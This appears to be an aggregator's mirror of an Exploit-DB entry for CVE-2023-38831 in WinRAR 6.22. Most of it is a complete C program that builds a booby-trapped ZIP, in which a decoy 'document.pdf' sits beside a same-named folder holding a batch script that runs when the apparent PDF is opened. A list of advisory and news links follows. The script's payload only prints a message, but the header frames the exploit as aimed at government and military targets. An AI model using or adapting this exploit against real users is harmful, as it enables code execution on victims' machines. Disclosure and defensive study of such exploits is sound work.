2
[remote] WinRAR version 6.22 - Remote Code Execution via ZIP archive
source link: https://www.exploit-db.com/exploits/51935
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
WinRAR version 6.22 - Remote Code Execution via ZIP archive
################################################################################################
# Exploit Title : EXPLOIT WinRAR version 6.22 Vulnerability CVE-2023-38831 #
# #
# Author : E1.Coders #
# #
# Contact : E1.Coders [at] Mail [dot] RU #
# #
# Security Risk : High #
# #
# Description : All target's GOV & Military websites #
# #
################################################################################################
# #
# Expl0iTs: #
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include "zip.h"
#define PDF_FILE "document.pdf"
#define FOLDER_NAME "document.pdf\\"
#define SCRIPT_FILE "script.bat"
#define ZIP_FILE "exploit.zip"
int main(void) {
zipFile zf = zipOpen(ZIP_FILE, APPEND_STATUS_CREATE);
if (zf == NULL) {
printf("Error opening ZIP file\n");
return -1;
}
zip_fileinfo zfi;
memset(&zfi, 0, sizeof(zfi));
if (zipOpenNewFileInZip(zf, PDF_FILE, &zfi, NULL, 0, NULL, 0, NULL, Z_DEFLATED, Z_DEFAULT_COMPRESSION) != ZIP_OK) {
printf("Error adding PDF file to ZIP file\n");
zipClose(zf, NULL);
return -1;
}
FILE *fp = fopen(PDF_FILE, "rb");
if (fp == NULL) {
printf("Error opening PDF file\n");
zipCloseFileInZip(zf);
zipClose(zf, NULL);
return -1;
}
char buffer[1024];
int bytes_read;
while ((bytes_read = fread(buffer, 1, sizeof(buffer), fp)) > 0) {
if (zipWriteInFileInZip(zf, buffer, bytes_read) < 0) {
printf("Error writing PDF file to ZIP file\n");
fclose(fp);
zipCloseFileInZip(zf);
zipClose(zf, NULL);
return -1;
}
}
fclose(fp);
zipCloseFileInZip(zf);
if (zipOpenNewFileInZip(zf, FOLDER_NAME, &zfi, NULL, 0, NULL, 0, NULL, Z_DEFLATED, Z_DEFAULT_COMPRESSION) != ZIP_OK) {
printf("Error adding folder to ZIP file\n");
zipClose(zf, NULL);
return -1;
}
zipCloseFileInZip(zf);
char script_name[256];
sprintf(script_name, "%s%s", FOLDER_NAME, SCRIPT_FILE);
if (zipOpenNewFileInZip(zf, script_name, &zfi, NULL, 0, NULL, 0, NULL, Z_DEFLATED, Z_DEFAULT_COMPRESSION) != ZIP_OK) {
printf("Error adding script file to ZIP file\n");
zipClose(zf, NULL);
return -1;
}
char script_content[] = "@echo off\nstart cmd /c \"echo You have been exploited by CVE-2023-38831 && pause\"\n";
if (zipWriteInFileInZip(zf, script_content, strlen(script_content)) < 0) {
printf("Error writing script file to ZIP file\n");
zipCloseFileInZip(zf);
zipClose(zf, NULL);
return -1;
}
zipCloseFileInZip(zf);
zipClose(zf, NULL);
printf("ZIP file created successfully\n");
return 0;
}
https://nvd.nist.gov/vuln/detail/CVE-2023-38831
https://nvd.nist.gov/vuln/detail/CVE-2023-38831
https://github.com/HDCE-inc/CVE-2023-38831
https://www.cvedetails.com/cve/CVE-2023-38831/
https://www.logpoint.com/en/blog/emerging-threats/cve-2023-38831-winrar-decompression-or-arbitrary-code-execution/
https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Exploit:Win32/CVE-2023-38831
http://packetstormsecurity.com/files/174573/WinRAR-Remote-Code-Execution.html
https://blog.google/threat-analysis-group/government-backed-actors-exploiting-winrar-vulnerability/
https://news.ycombinator.com/item?id=37236100
https://www.bleepingcomputer.com/news/security/winrar-zero-day-exploited-since-april-to-hack-trading-accounts/
https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/
https://hdce.medium.com/cve-2023-38831-winrar-zero-day-poses-new-risks-for-traders-684911befad2
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK